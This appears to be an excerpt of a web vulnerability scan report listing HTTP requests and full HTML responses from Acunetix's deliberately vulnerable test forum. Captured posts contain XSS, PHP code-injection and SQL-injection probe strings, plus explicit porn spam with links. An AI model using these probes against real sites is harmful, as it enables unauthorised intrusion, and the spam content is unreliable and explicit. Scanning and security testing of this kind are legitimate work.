| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4174 |
| Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4421 |
| Response Body - size: 4,421 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4138 |
| Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4374 |
| Response Body - size: 4,374 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4491 |
| Response Body - size: 4,491 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- 